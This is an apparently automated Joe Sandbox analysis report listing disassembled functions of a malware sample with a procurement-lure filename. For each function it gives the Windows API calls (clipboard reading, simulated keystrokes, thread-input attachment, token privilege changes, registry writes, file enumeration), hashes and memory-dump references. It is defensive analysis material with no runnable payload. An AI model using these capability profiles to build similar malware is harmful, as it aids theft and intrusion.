                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 59cdc44820f130c6af0d53c8265d35eb2542f6f61e3f32a02a20e45f0d30e46e
                                              • Instruction ID: 3aed390676b677f5d7e11983775c1b327a797e7766ff7680340ef2bf749d75db
                                              • Opcode Fuzzy Hash: 59cdc44820f130c6af0d53c8265d35eb2542f6f61e3f32a02a20e45f0d30e46e
                                              • Instruction Fuzzy Hash: 007154742083428FCB14EF25D491AAEB7E0BF98314F08496DF5969B2A2DF70ED45CB52
                                              Function 00100E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: bebdafbde304a508309a7850821c1fc7a9c1600cc519345488a5aef11963eb83
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: E431D770A00106DBC71ADF58C480A69F7A6FF5D300F658AA5E489DB691D771EDC1CB80
                                              Function 00EF229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 00EF22B1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction ID: 8c815606f2a22b20c61b9d386b4cf78b7e5af8a682bd60d4ab9503a95b352acb
                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction Fuzzy Hash: 90E0BF7498110EEFDB00EFA8D5496EE7BB4EF04311F1005A5FE05E7690DB309E548A62
                                              Function 00EF22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 00EF22B1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: 749081f75b794bb7655f3a97efa9249d4f57179637944d3f3c237c7b2da5b36a
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 09E0E67498110EDFDB00EFB8D5496AE7FB4EF04311F100165FD01E2280D7309D508A72

                                              Non-executed Functions

                                              Function 0016CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0016CE50
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0016CE91
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0016CED6
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0016CF00
                                              • SendMessageW.USER32 ref: 0016CF29
                                              • _wcsncpy.LIBCMT ref: 0016CFA1
                                              • GetKeyState.USER32(00000011), ref: 0016CFC2
                                              • GetKeyState.USER32(00000009), ref: 0016CFCF
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0016CFE5
                                              • GetKeyState.USER32(00000010), ref: 0016CFEF
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0016D018
                                              • SendMessageW.USER32 ref: 0016D03F
                                              • SendMessageW.USER32(?,00001030,?,0016B602), ref: 0016D145
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0016D15B
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0016D16E
                                              • SetCapture.USER32(?), ref: 0016D177
                                              • ClientToScreen.USER32(?,?), ref: 0016D1DC
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0016D1E9
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0016D203
                                              • ReleaseCapture.USER32 ref: 0016D20E
                                              • GetCursorPos.USER32(?), ref: 0016D248
                                              • ScreenToClient.USER32(?,?), ref: 0016D255
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0016D2B1
                                              • SendMessageW.USER32 ref: 0016D2DF
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0016D31C
                                              • SendMessageW.USER32 ref: 0016D34B
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0016D36C
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0016D37B
                                              • GetCursorPos.USER32(?), ref: 0016D39B
                                              • ScreenToClient.USER32(?,?), ref: 0016D3A8
                                              • GetParent.USER32(?), ref: 0016D3C8
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0016D431
                                              • SendMessageW.USER32 ref: 0016D462
                                              • ClientToScreen.USER32(?,?), ref: 0016D4C0
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0016D4F0
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0016D51A
                                              • SendMessageW.USER32 ref: 0016D53D
                                              • ClientToScreen.USER32(?,?), ref: 0016D58F
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0016D5C3
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016D65F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$@U=u$F
                                              • API String ID: 3977979337-1007936534
                                              • Opcode ID: c0720c979cc1d16f581a6bc00ee926a5fbc9b51d0e7159df76c334490a59ce0e
                                              • Instruction ID: 952aa62af43eb65268fb1e55a362b1d8c3215bb730c3c12e260d4058021a0f46
                                              • Opcode Fuzzy Hash: c0720c979cc1d16f581a6bc00ee926a5fbc9b51d0e7159df76c334490a59ce0e
                                              • Instruction Fuzzy Hash: B142CB70605340AFC724CF28DC48EAABBF9FF49314F14451DF6A6976A1C77298A1CB92
                                              Function 0016804A Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 571windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0016873F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: %d/%02d/%02d$@U=u
                                              • API String ID: 3850602802-2764005415
                                              • Opcode ID: c150a35aa0aea26c336250a7fd2fbbf1b3fd8950a95109cb9264f91c14d693cf
                                              • Instruction ID: 8fdcee2e4321e2c43e02aa58819409227a79e2349e875d98e0a7482cb4423dc9
                                              • Opcode Fuzzy Hash: c150a35aa0aea26c336250a7fd2fbbf1b3fd8950a95109cb9264f91c14d693cf
                                              • Instruction Fuzzy Hash: BE12C471501244AFEB259F28DC49FAE7BB8EF49710F21422DF516EA2E1DFB08991CB50
                                              Function 000F710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove$_memset
                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                              • API String ID: 1357608183-1798697756
                                              • Opcode ID: 1c645521647b3ca19851c3a09396bff064d18e53c314f6e5eae7a802cb2f391d
                                              • Instruction ID: 77c00d6c36b5d934b4ac2897b2c0eeac14a2c3380a7e41ca4ab7e35990a19ddf
                                              • Opcode Fuzzy Hash: 1c645521647b3ca19851c3a09396bff064d18e53c314f6e5eae7a802cb2f391d
                                              • Instruction Fuzzy Hash: 72939071A04219DFDB24DF98C881BBDB7B1FF48710F25816AE959EB280E7709E81DB44
                                              Function 000E4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 000E4A3D
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0011DA8E
                                              • IsIconic.USER32(?), ref: 0011DA97
                                              • ShowWindow.USER32(?,00000009), ref: 0011DAA4
                                              • SetForegroundWindow.USER32(?), ref: 0011DAAE
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0011DAC4
                                              • GetCurrentThreadId.KERNEL32 ref: 0011DACB
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0011DAD7
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011DAE8
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011DAF0
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0011DAF8
                                              • SetForegroundWindow.USER32(?), ref: 0011DAFB
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB10
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB1B
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB25
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB2A
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB33
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB38
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011DB42
                                              • keybd_event.USER32(00000012,00000000), ref: 0011DB47
                                              • SetForegroundWindow.USER32(?), ref: 0011DB4A
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0011DB71
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: a1c8da74b20993ca7a7d0d066f728caa8b249cae9b7f6880d2bbd6d7f7ff1ae7
                                              • Instruction ID: a3a1f5705d5818fd6a6997dcd13a256702710f516dd4cd963ae8c3579da67237
                                              • Opcode Fuzzy Hash: a1c8da74b20993ca7a7d0d066f728caa8b249cae9b7f6880d2bbd6d7f7ff1ae7
                                              • Instruction Fuzzy Hash: 73318571A44318BFEB246F61AC4AFBF3E6CEB44B50F114039FA05E71D0C6B05D81AAA5
                                              Function 00138858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00138CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00138D0D
                                                • Part of subcall function 00138CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00138D3A
                                                • Part of subcall function 00138CC3: GetLastError.KERNEL32 ref: 00138D47
                                              • _memset.LIBCMT ref: 0013889B
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001388ED
                                              • CloseHandle.KERNEL32(?), ref: 001388FE
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00138915
                                              • GetProcessWindowStation.USER32 ref: 0013892E
                                              • SetProcessWindowStation.USER32(00000000), ref: 00138938
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00138952
                                                • Part of subcall function 00138713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00138851), ref: 00138728
                                                • Part of subcall function 00138713: CloseHandle.KERNEL32(?,?,00138851), ref: 0013873A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: 35bb9e27852e22e6512e8eb842bbcb4fa6003fbb4e3b61a92c103738ae4ecf99
                                              • Instruction ID: bc97aa9a22ac78e42a591a69a82a15b7c5804b1ccabeea2d67ab3c65dc98c4e0
                                              • Opcode Fuzzy Hash: 35bb9e27852e22e6512e8eb842bbcb4fa6003fbb4e3b61a92c103738ae4ecf99
                                              • Instruction Fuzzy Hash: 57813871900349AFDF11DFA4DC49AEEBBB8EF18304F18416AF910A72A1DB718E55DB60
                                              Function 0015425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32(0016F910), ref: 00154284
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00154292
                                              • GetClipboardData.USER32(0000000D), ref: 0015429A
                                              • CloseClipboard.USER32 ref: 001542A6
                                              • GlobalLock.KERNEL32(00000000), ref: 001542C2
                                              • CloseClipboard.USER32 ref: 001542CC
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 001542E1
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 001542EE
                                              • GetClipboardData.USER32(00000001), ref: 001542F6
                                              • GlobalLock.KERNEL32(00000000), ref: 00154303
                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00154337
                                              • CloseClipboard.USER32 ref: 00154447
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                              • String ID:
                                              • API String ID: 3222323430-0
                                              • Opcode ID: 200c64c7a72d2eb206b77e6e6d7a958cb15ed0299b96e02e72bfddb39b27dc35
                                              • Instruction ID: 391dbddf5d39bd2c5ca99bb00552225fabbaf10b22dd631597a0747da415813d
                                              • Opcode Fuzzy Hash: 200c64c7a72d2eb206b77e6e6d7a958cb15ed0299b96e02e72bfddb39b27dc35
                                              • Instruction Fuzzy Hash: B051A331204301AFD301EF61EC95FAE77A8AF84B05F04452DF966D61E2DFB0D9898B62
                                              Function 0014C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0014C9F8
                                              • FindClose.KERNEL32(00000000), ref: 0014CA4C
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0014CA71
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0014CA88
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0014CAAF
                                              • __swprintf.LIBCMT ref: 0014CAFB
                                              • __swprintf.LIBCMT ref: 0014CB3E
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • __swprintf.LIBCMT ref: 0014CB92
                                                • Part of subcall function 001038D8: __woutput_l.LIBCMT ref: 00103931
                                              • __swprintf.LIBCMT ref: 0014CBE0
                                                • Part of subcall function 001038D8: __flsbuf.LIBCMT ref: 00103953
                                                • Part of subcall function 001038D8: __flsbuf.LIBCMT ref: 0010396B
                                              • __swprintf.LIBCMT ref: 0014CC2F
                                              • __swprintf.LIBCMT ref: 0014CC7E
                                              • __swprintf.LIBCMT ref: 0014CCCD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: 02051c0d9cf7013a5b66d868d6d3ed0d1be0dd1ffdcb04d1c5f4d56666507081
                                              • Instruction ID: 01018b8aa5e39940581401122417e68f322b38695f315af12ed2d7b1b305b882
                                              • Opcode Fuzzy Hash: 02051c0d9cf7013a5b66d868d6d3ed0d1be0dd1ffdcb04d1c5f4d56666507081
                                              • Instruction Fuzzy Hash: 4EA13BB1508344AFC700EB65CC86DAFB7ECAF94704F44492DF59693192EB74DA08CBA2
                                              Function 0014F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0014F221
                                              • _wcscmp.LIBCMT ref: 0014F236
                                              • _wcscmp.LIBCMT ref: 0014F24D
                                              • GetFileAttributesW.KERNEL32(?), ref: 0014F25F
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0014F279
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0014F291
                                              • FindClose.KERNEL32(00000000), ref: 0014F29C
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0014F2B8
                                              • _wcscmp.LIBCMT ref: 0014F2DF
                                              • _wcscmp.LIBCMT ref: 0014F2F6
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0014F308
                                              • SetCurrentDirectoryW.KERNEL32(0019A5A0), ref: 0014F326
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0014F330
                                              • FindClose.KERNEL32(00000000), ref: 0014F33D
                                              • FindClose.KERNEL32(00000000), ref: 0014F34F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: 1e9cec1673436751533d66fab3f1842fb027bde437ebafac35b7ed70c1199261
                                              • Instruction ID: 25c1b10e5218a118ca34ada51af6305c3ac16e023e7702db85c26a1de539e8cc
                                              • Opcode Fuzzy Hash: 1e9cec1673436751533d66fab3f1842fb027bde437ebafac35b7ed70c1199261
                                              • Instruction Fuzzy Hash: DB31C7766002196BDF10DFB4EC58EDE77ACAF08360F50017DE814D32A0DBB0DA86CA50
                                              Function 00160AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160BDE
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0016F910,00000000,?,00000000,?,?), ref: 00160C4C
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00160C94
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00160D1D
                                              • RegCloseKey.ADVAPI32(?), ref: 0016103D
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016104A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: f8995534cca2fcbe2e43eab76a2abed610811bcf8013f6def69ce04b3568a42e
                                              • Instruction ID: f4fa9ff476d6a2ecb7703ec0673fb46d0e46bca2a538863be586d40b85151d8d
                                              • Opcode Fuzzy Hash: f8995534cca2fcbe2e43eab76a2abed610811bcf8013f6def69ce04b3568a42e
                                              • Instruction Fuzzy Hash: A20291752046519FCB14EF19C881E6AB7E5FF88714F04886DF88A9B3A2CB70ED51CB81
                                              Function 0014F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0014F37E
                                              • _wcscmp.LIBCMT ref: 0014F393
                                              • _wcscmp.LIBCMT ref: 0014F3AA
                                                • Part of subcall function 001445C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001445DC
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0014F3D9
                                              • FindClose.KERNEL32(00000000), ref: 0014F3E4
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0014F400
                                              • _wcscmp.LIBCMT ref: 0014F427
                                              • _wcscmp.LIBCMT ref: 0014F43E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0014F450
                                              • SetCurrentDirectoryW.KERNEL32(0019A5A0), ref: 0014F46E
